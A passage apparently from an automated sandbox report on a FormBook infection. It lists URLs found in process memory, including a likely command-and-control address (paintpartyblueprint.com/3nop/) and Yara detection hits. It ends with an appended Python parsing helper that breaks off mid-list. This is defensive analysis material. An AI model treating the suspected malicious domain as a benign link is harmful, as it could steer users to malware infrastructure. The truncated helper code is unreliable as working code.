          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000005.00000000.289493552.000000000A9D0000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000005.00000000.289493552.000000000A9D0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 00000005.00000000.290136363.000000000B1D0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: control.exe, 0000000E.00000002.503263139.0000000005069000.00000004.00000001.sdmp String found in binary or memory: http://www.paintpartyblueprint.com
          Source: control.exe, 0000000E.00000002.503263139.0000000005069000.00000004.00000001.sdmp String found in binary or memory: http://www.paintpartyblueprint.com/3nop/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.290323629.000000000B436000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
          Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico
          Source: control.exe, 0000000E.00000002.497529632.0000000000AF5000.00000004.00000020.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
          Source: control.exe, 0000000E.00000002.497529632.0000000000AF5000.00000004.00000020.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
          Source: control.exe, 0000000E.00000002.497529632.0000000000AF5000.00000004.00000020.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
          Source: control.exe, 0000000E.00000002.497529632.0000000000AF5000.00000004.00000020.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033b=z
          Source: control.exe, 0000000E.00000002.497078328.000000000076A000.00000004.00000001.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srfken&display=windesktop&theme=win7&lc=1033&redirect_uri=htt
          Source: control.exe, 0000000E.00000002.497529632.0000000000AF5000.00000004.00000020.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033Sp
          Source: control.exe, 0000000E.00000002.497529632.0000000000AF5000.00000004.00000020.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
          Source: control.exe, 0000000E.00000002.497529632.0000000000AF5000.00000004.00000020.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
          Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match File source: 00000004.00000002.321776702.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.317379790.00000000030A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000000E.00000002.498679834.0000000000DE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000000E.00000002.497113298.00000000007A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.317715716.0000000004A90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000000E.00000002.498454375.0000000000D90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 4.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 4.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE
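Added triage helper (not part of the sandbox report) for the two kinds of `Source:` entries above: the "String found in binary or memory" hits and the Yara matches. It separates the URLs that live in explorer.exe's cached browser data (search-provider and favicon entries, noise in this context) from those in the injected control.exe process, and decodes the memory-dump identifiers to show which Yara hits sit in executable memory. The process numbers (4 = ieinstal.exe, 14 = control.exe, 5 = explorer.exe) are taken from the report's own `4_2_…`/`14_2_…` identifiers and dump names; the reading of the fifth dump-name field as a Win32 page-protection constant (0x40 = PAGE_EXECUTE_READWRITE) is an assumption about the naming scheme, not something the page states. The sample lines are copied from the entries above.

```python
import re
from collections import defaultdict

# Process numbers as this report uses them (4_2_... is ieinstal.exe,
# 14_2_... is control.exe; explorer.exe's dumps start with 00000005).
PROCESSES = {4: "ieinstal.exe", 5: "explorer.exe", 14: "control.exe"}

# Memory-dump identifier: <pid>.<run>.<dumpid>.<base>.<protect>.<type>.sdmp
SDMP_RE = re.compile(
    r"(?P<pid>[0-9A-Fa-f]{8})\.(?P<run>[0-9A-Fa-f]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\."
    r"(?P<type>[0-9A-Fa-f]{8})\.sdmp"
)
# Assumption: the fifth field is the Win32 page protection of the region.
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
EXECUTE_MASK = 0x10 | 0x20 | 0x40 | 0x80   # every PAGE_EXECUTE* constant

# Both patterns tolerate the fused form the page extraction produced
# ("...sdmpString found", "Yara matchFile source").
STRING_RE = re.compile(
    r"^Source:\s*(?P<proc>\S+),\s*(?P<dump>\S+\.sdmp)\s*"
    r"String found in binary or memory:\s*(?P<url>\S+)"
)
YARA_RE = re.compile(
    r"^Source:\s*Yara match\s*File source:\s*(?P<dump>\S+\.sdmp),\s*type:\s*MEMORY"
)

# Constructed sample: a handful of the report lines above, not live output.
SAMPLE_LINES = [
    "Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico",
    "Source: control.exe, 0000000E.00000002.503263139.0000000005069000.00000004.00000001.sdmp String found in binary or memory: http://www.paintpartyblueprint.com",
    "Source: control.exe, 0000000E.00000002.503263139.0000000005069000.00000004.00000001.sdmp String found in binary or memory: http://www.paintpartyblueprint.com/3nop/",
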